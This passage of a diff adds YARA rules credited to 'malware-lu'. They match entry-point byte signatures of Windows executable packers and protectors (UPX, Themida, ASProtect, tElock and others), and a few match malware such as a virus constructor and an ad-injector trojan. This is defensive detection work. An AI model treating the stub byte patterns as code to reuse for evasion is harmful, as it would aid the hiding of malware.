+		$a0 = { 83 3D 40 ?? ?? ?? 00 75 05 E9 01 00 00 00 C3 E8 41 00 00 00 B8 80 ?? ?? ?? 2B 05 08 ?? ?? ?? A3 3C ?? ?? ?? E8 5E 00 00 00 E8 E0 01 00 00 E8 EC 06 00 00 E8 F7 05 00 00 A1 3C ?? ?? ?? C7 05 40 ?? ?? ?? 01 00 00 00 01 05 00 ?? ?? ?? FF 35 00 ?? ?? ?? C3 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EnigmaProtector11X13XSukhovVladimirSergeNMarkin
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 B8 00 10 40 00 E8 01 00 00 00 9A 83 C4 10 8B E5 5D E9 }
+
+condition:
+		$a0
+}
+	
+	
+rule HardlockdongleAlladin
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5C 5C 2E 5C 48 41 52 44 4C 4F 43 4B 2E 56 58 44 00 00 00 00 5C 5C 2E 5C 46 45 6E 74 65 44 65 76 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov190c
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 10 F2 40 00 68 74 9D 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upack_PatchDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 81 3A 00 00 00 02 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeJoinerV10Yodaf2f
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 00 10 40 00 68 04 01 00 00 E8 39 03 00 00 05 00 10 40 00 C6 00 5C 68 04 01 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PCShrink071beta
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 01 AD 54 3A 40 00 FF B5 50 3A 40 00 6A 40 FF 95 88 3A 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtMASM32TASM32
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 03 F7 23 FE 33 FB EB 02 CD 20 BB 80 ?? 40 00 EB 01 86 EB 01 90 B8 F4 00 00 00 83 EE 05 2B }
+	$a1 = { 03 F7 23 FE 33 FB EB 02 CD 20 BB 80 ?? 40 00 EB 01 86 EB 01 90 B8 F4 00 00 00 83 EE 05 2B F2 81 F6 EE 00 00 00 EB 02 CD 20 8A 0B E8 02 00 00 00 A9 54 5E C1 EE 07 F7 D7 EB 01 DE 81 E9 B7 96 A0 C4 EB 01 6B EB 02 CD 20 80 E9 4B C1 CF 08 EB 01 71 80 E9 1C EB }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PEiDBundlev101BoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 23 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPX072
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AdFlt2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 00 01 9C 0F A0 0F A8 60 FD 6A 00 0F A1 BE ?? ?? AD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPack120BasicEditionaPLibAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 83 7C 24 28 01 75 0C 8B 44 24 24 89 85 92 05 00 00 EB 0C 8B 85 8E 05 00 00 89 85 92 05 00 00 8D B5 BA 05 00 00 8D 9D 41 04 00 00 33 FF E8 38 01 00 00 EB 1B 8B 85 92 05 00 00 FF 74 37 04 01 04 24 FF 34 37 01 04 24 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 DF 83 BD 9E 05 00 00 00 74 0E 83 BD A2 05 00 00 00 74 05 E8 D6 01 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AsCryptv01SToRM1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 81 ?? ?? ?? ?? ?? ?? 83 ?? ?? ?? ?? ?? ?? ?? 83 ?? ?? E2 ?? EB }
+
+condition:
+		$a0
+}
+	
+	
+rule SmartEMicrosoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 15 03 00 00 00 ?? 00 00 00 00 00 00 00 00 00 00 00 68 00 00 00 00 55 E8 00 00 00 00 5D 81 ED 1D 00 00 00 8B C5 55 60 9C 2B 85 8F 07 00 00 89 85 83 07 00 00 FF 74 24 2C E8 BB 01 00 00 0F 82 2F 06 00 00 E8 8E 04 00 00 49 0F 88 23 06 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PE_Admin10EncryptPE12003518SoldFlyingCat
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 79 01 00 00 90 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 }
+	$a1 = { 60 9C 64 FF 35 00 00 00 00 E8 79 01 00 00 90 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule MacromediaWindowsFlashProjectorPlayerv40
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 44 56 FF 15 24 41 43 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPack32v100v111v112v120
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 55 8B E8 33 DB EB 60 0D 0A 0D 0A 57 57 50 61 63 6B 33 32 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VProtectorV11vcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 1A ED 41 00 B9 EC EB 41 00 50 51 E8 74 00 00 00 E8 51 6A 00 00 58 83 E8 10 B9 B3 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MaskPE16yzkzero
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 36 81 2C 24 ?? ?? ?? 00 C3 60 }
+
+condition:
+		$a0
+}
+	
+	
+rule bambam001bedrock
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 14 E8 9A 05 00 00 8B D8 53 68 ?? ?? ?? ?? E8 6C FD FF FF B9 05 00 00 00 8B F3 BF ?? ?? ?? ?? 53 F3 A5 E8 8D 05 00 00 8B 3D ?? ?? ?? ?? A1 ?? ?? ?? ?? 66 8B 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 2B CF 89 45 E8 89 0D ?? ?? ?? ?? 66 89 55 EC 8B 41 3C 33 D2 03 C1 83 C4 10 66 8B 48 06 66 8B 50 14 81 E1 FF FF 00 00 8D 5C 02 18 8D 41 FF 85 C0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01MEW11SE10Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectv20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner01BorlandDelphi6070Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 53 8B D8 33 C0 A3 09 09 09 00 6A 00 E8 09 09 00 FF A3 09 09 09 00 A1 09 09 09 00 A3 09 09 09 00 33 C0 A3 09 09 09 00 33 C0 A3 09 09 09 00 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ObsidiumV12ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 77 1E 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01PEProtect09Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 52 51 55 57 64 67 A1 30 00 85 C0 78 0D E8 07 00 00 00 58 83 C0 07 C6 90 C3 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPack32v1x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 55 8B E8 33 DB EB 60 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ChSfxsmallv11
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BA ?? ?? E8 ?? ?? 8B EC 83 EC ?? 8C C8 BB ?? ?? B1 ?? D3 EB 03 C3 8E D8 05 ?? ?? 89 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXModifiedStubcFarbrauschConsumerConsulting
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 E8 00 00 00 00 5B 83 C3 66 A4 FF D3 73 FB 31 C9 FF D3 73 14 31 C0 FF D3 73 1D 41 B0 10 FF D3 10 C0 73 FA 75 3C AA EB E2 E8 4A 00 00 00 49 E2 10 E8 40 00 00 00 EB 28 AC D1 E8 74 45 11 C9 EB 1C 91 48 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02NorthStarPEShrinker13Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv098tE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 25 E4 FF FF 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtMicrosoftVisualBasicMASM32
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 09 94 0F B7 FF 68 80 ?? ?? 00 81 F6 8E 00 00 00 5B EB 02 11 C2 8D 05 F4 00 00 00 47 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv022v023BetaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 07 BE 88 01 40 00 AD 8B F8 59 95 F3 A5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxVirusConstructorbased
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BB ?? ?? B9 ?? ?? 2E ?? ?? ?? ?? 43 43 ?? ?? 8B EC CC 8B ?? ?? 81 ?? ?? ?? 06 1E B8 ?? ?? CD 21 3D ?? ?? ?? ?? 8C D8 48 8E D8 }
+	$a1 = { E8 ?? ?? 5D 81 ?? ?? ?? 06 1E E8 ?? ?? E8 ?? ?? ?? ?? 2E ?? ?? ?? ?? ?? ?? B4 4A BB FF FF CD 21 83 ?? ?? B4 4A CD 21 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PESHiELD02
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 41 4E 41 4B 49 4E 5D 83 ED 06 EB 02 EA 04 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02Gleam100Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 0B 83 EC 0C 53 56 57 E8 24 02 00 FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DBPEv233DingBoy
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 20 ?? ?? 40 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9C 55 57 56 52 51 53 9C E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 9C 6A 10 73 0B EB 02 C1 51 E8 06 ?? ?? ?? C4 11 73 F7 5B CD 83 C4 04 EB 02 99 EB FF 0C 24 71 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01PEtite2xlevel0Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 B8 00 90 90 00 6A 00 68 90 90 90 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 03 00 68 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EPack14litefinalby6aHguT
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 C0 8B C0 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElock098tE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 25 E4 FF FF 00 00 00 ?? ?? ?? ?? 1E ?? ?? 00 00 00 00 00 00 00 00 00 3E ?? ?? 00 2E ?? ?? 00 26 ?? ?? 00 00 00 00 00 00 00 00 00 4B ?? ?? 00 36 ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 ?? ?? 00 00 00 00 00 69 ?? ?? 00 00 00 00 00 56 ?? ?? 00 00 00 00 00 69 ?? ?? 00 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 75 73 65 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UnnamedScrambler10p0ke
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 EC 53 56 33 C0 89 45 ?? ?? ?? ?? 40 00 E8 11 F4 FF FF BE 30 6B 40 00 33 C0 55 68 C9 42 40 00 64 FF 30 64 89 20 E8 C9 FA FF FF BA D8 42 40 00 8B ?? ?? ?? ?? FF FF 8B D8 B8 28 6B 40 00 8B 16 E8 37 F0 FF FF B8 2C 6B 40 00 8B 16 E8 2B F0 FF FF B8 28 6B 40 00 E8 19 F0 FF FF 8B D0 8B C3 8B 0E E8 42 E3 FF FF BA DC 42 40 00 8B C6 E8 2A FA FF FF 8B D8 B8 20 6B 40 00 8B 16 E8 FC EF FF FF B8 24 6B 40 00 8B 16 E8 F0 EF FF FF B8 20 6B 40 00 E8 DE EF FF FF 8B D0 8B C3 8B 0E E8 07 E3 FF FF 6A 00 6A 19 6A 00 6A 32 A1 28 6B 40 00 E8 59 EF FF FF 83 E8 05 03 C0 8D 55 EC E8 94 FE FF FF 8B 55 EC B9 24 6B 40 00 A1 20 6B 40 00 E8 E2 F6 FF FF 6A 00 6A 19 6A 00 6A 32 }
+
+condition:
+		$a0
+}
+	
+	
+rule WARNINGTROJANADinjector
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 61 BE 00 20 44 00 8D BE 00 F0 FB FF C7 87 9C E0 04 00 6A F0 8A 5E 57 83 CD FF EB 0E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule TopSpeedv3011989
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1E BA ?? ?? 8E DA 8B ?? ?? ?? 8B ?? ?? ?? FF ?? ?? ?? 50 53 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CodeCryptv0164
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 2E 03 00 00 EB 02 83 3D 58 EB 02 FF 1D 5B EB 02 0F C7 5F EB 03 FF 1D 34 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXHiT001DJSiba
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E2 FA 94 FF E0 61 00 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner01ASProtectAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PocketPCARM
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { F0 40 2D E9 00 40 A0 E1 01 50 A0 E1 02 60 A0 E1 03 70 A0 E1 ?? 00 00 EB 07 30 A0 E1 06 20 A0 E1 05 10 A0 E1 04 00 A0 E1 ?? ?? ?? EB F0 40 BD E8 ?? 00 00 EA ?? 40 2D E9 ?? ?? 9F E5 ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 9F E5 00 ?? ?? ?? ?? 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AnskyaBinderv11Anskya
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? ?? ?? 00 BB F8 11 40 00 33 ED 83 EE 04 39 2E 74 11 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VProtectorV10Bvcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 CA 37 41 00 68 06 38 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SecurePE1Xwwwdeepzoneorg
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B 04 24 E8 00 00 00 00 5D 81 ED 4C 2F 40 00 89 85 61 2F 40 00 8D 9D 65 2F 40 00 53 C3 00 00 00 00 8D B5 BA 2F 40 00 8B FE BB 65 2F 40 00 B9 C6 01 00 00 AD 2B C3 C1 C0 03 33 C3 AB 43 81 FB 8E 2F 40 00 75 05 BB 65 2F 40 00 E2 E7 89 AD 1A 31 40 00 89 AD 55 34 40 00 89 AD 68 34 40 00 8D 85 BA 2F 40 00 50 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule yPv10bbyAshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 53 56 57 60 E8 00 00 00 00 5D 81 ED 4C 32 40 00 E8 03 00 00 00 EB 01 ?? B9 EA 47 40 00 81 E9 E9 32 40 00 8B D5 81 C2 E9 32 40 00 8D 3A 8B F7 33 C0 E8 04 00 00 00 90 EB 01 C2 E8 03 00 00 00 EB 01 ?? AC ?? ?? ?? ?? ?? ?? ?? EB 01 E8 }
+
+condition:
+		$a0
+}
+	
+	
+rule MSLRHv031a
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 D1 CB 0F CA C1 CA E0 D1 CA 0F C8 EB 01 F1 0F C0 C9 D2 D1 0F C1 C0 D3 DA C0 D6 A8 EB 01 DE D0 EC 0F C1 CB D0 CF 0F C1 D1 D2 DB 0F C8 EB 01 BC C0 E9 C6 C1 D0 91 0F CB EB 01 73 0F CA 87 D9 87 D2 D0 CF 87 D9 0F C8 EB 01 C1 EB 01 A2 86 CA D0 E1 0F C0 CB 0F }
+	$a1 = { 60 D1 CB 0F CA C1 CA E0 D1 CA 0F C8 EB 01 F1 0F C0 C9 D2 D1 0F C1 C0 D3 DA C0 D6 A8 EB 01 DE D0 EC 0F C1 CB D0 CF 0F C1 D1 D2 DB 0F C8 EB 01 BC C0 E9 C6 C1 D0 91 0F CB EB 01 73 0F CA 87 D9 87 D2 D0 CF 87 D9 0F C8 EB 01 C1 EB 01 A2 86 CA D0 E1 0F C0 CB 0F CA C0 C7 91 0F CB C1 D9 0C 86 F9 86 D7 D1 D9 EB 01 A5 EB 01 11 EB 01 1D 0F C1 C2 0F CB 0F C1 C2 EB 01 A1 C0 E9 FD 0F C1 D1 EB 01 E3 0F CA 87 D9 EB 01 F3 0F CB 87 C2 0F C0 F9 D0 F7 EB 01 2F 0F C9 C0 DC C4 EB 01 35 0F CA D3 D1 86 C8 EB 01 01 0F C0 F5 87 C8 D0 DE EB 01 95 EB 01 E1 EB 01 FD EB 01 EC 87 D3 0F CB C1 DB 35 D3 E2 0F C8 86 E2 86 EC C1 FB 12 D2 EE 0F C9 D2 F6 0F CA 87 C3 C1 D3 B3 EB 01 BF D1 CB 87 C9 0F CA 0F C1 DB EB 01 44 C0 CA F2 0F C1 D1 0F CB EB 01 D3 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 }
+
+condition:
+		$a0 or $a1 at pe.entry_point
+}
+	
+	
+rule Upackv039finalDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 56 10 E2 E3 B1 04 D3 E0 03 E8 8D 53 18 33 C0 55 40 51 D3 E0 8B EA 91 }
+	$a1 = { FF 76 38 AD 50 8B 3E BE F0 ?? ?? ?? 6A 27 59 F3 A5 FF 76 04 83 C8 FF }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule vprotector12vcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 0B 5B 56 50 72 6F 74 65 63 74 5D 00 E8 24 00 00 00 8B 44 24 04 8B 00 3D 04 00 00 80 75 08 8B 64 24 08 EB 04 58 EB 0C E9 64 8F 05 00 00 00 00 74 F3 75 F1 EB 24 64 FF 35 00 00 00 00 EB 12 FF 9C 74 03 75 01 E9 81 0C 24 00 01 00 00 9D 90 EB F4 64 89 25 00 }
+	$a1 = { EB 0B 5B 56 50 72 6F 74 65 63 74 5D 00 E8 24 00 00 00 8B 44 24 04 8B 00 3D 04 00 00 80 75 08 8B 64 24 08 EB 04 58 EB 0C E9 64 8F 05 00 00 00 00 74 F3 75 F1 EB 24 64 FF 35 00 00 00 00 EB 12 FF 9C 74 03 75 01 E9 81 0C 24 00 01 00 00 9D 90 EB F4 64 89 25 00 00 00 00 EB E6 E8 16 00 00 00 8B 5C 24 0C 8B A3 C4 00 00 00 64 8F 05 00 00 00 00 83 C4 04 EB 14 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C9 99 F7 F1 E9 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 16 00 00 00 8B 5C 24 0C 8B A3 C4 00 00 00 64 8F 05 00 00 00 00 83 C4 04 EB 14 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C9 99 F7 F1 E9 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 33 F6 E8 10 00 00 00 8B 64 24 08 64 8F 05 00 00 00 00 58 EB 13 C7 83 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 AD CD 20 E8 05 00 00 00 0F 01 EB 05 E8 EB FB 00 00 83 C4 04 E8 08 00 00 00 0F 01 83 C0 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule FakeNinjav28Spirit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BA ?? ?? ?? ?? FF E2 64 11 40 00 FF 35 84 11 40 00 E8 40 }
+
+condition:
+		$a0
+}
+	
+	
+rule PECompactv133
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 80 40 ?? 87 DD 8B 85 A6 80 40 ?? 01 85 03 80 40 ?? 66 C7 85 00 80 40 ?? 90 90 01 85 9E 80 40 ?? BB E8 0E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DragonArmorOrient
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BF 4C ?? ?? 00 83 C9 FF 33 C0 68 34 ?? ?? 00 F2 AE F7 D1 49 51 68 4C ?? ?? 00 E8 11 0A 00 00 83 C4 0C 68 4C ?? ?? 00 FF 15 00 ?? ?? 00 8B F0 BF 4C ?? ?? 00 83 C9 FF 33 C0 F2 AE F7 D1 49 BF 4C ?? ?? 00 8B D1 68 34 ?? ?? 00 C1 E9 02 F3 AB 8B CA 83 E1 03 F3 AA BF 5C ?? ?? 00 83 C9 FF 33 C0 F2 AE F7 D1 49 51 68 5C ?? ?? 00 E8 C0 09 00 00 8B 1D 04 ?? ?? 00 83 C4 0C 68 5C ?? ?? 00 56 FF D3 A3 D4 ?? ?? 00 BF 5C ?? ?? 00 83 C9 FF 33 C0 F2 AE F7 D1 49 BF 5C ?? ?? 00 8B D1 68 34 ?? ?? 00 C1 E9 02 F3 AB 8B CA 83 E1 }
+
+condition:
+		$a0
+}
+	
+	
+rule ThemidaWinLicenseV1802OreansTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 00 00 00 00 60 0B C0 74 68 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SoftDefender1xRandyLi
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 74 07 75 05 19 32 67 E8 E8 74 1F 75 1D E8 68 39 44 CD 00 59 9C 50 74 0A 75 08 E8 59 C2 04 00 55 8B EC E8 F4 FF FF FF 56 57 53 78 0F 79 0D E8 34 99 47 49 34 33 EF 31 34 52 47 23 68 A2 AF 47 01 59 E8 01 00 00 00 FF 58 05 E6 01 00 00 03 C8 74 BD 75 BB E8 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PellesC2x4xDLLPelleOrinius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 53 56 57 8B 5D 0C 8B 75 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPX290LZMADelphistubMarkusOberhumerLaszloMolnarJohnReiser
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 }
+
+condition:
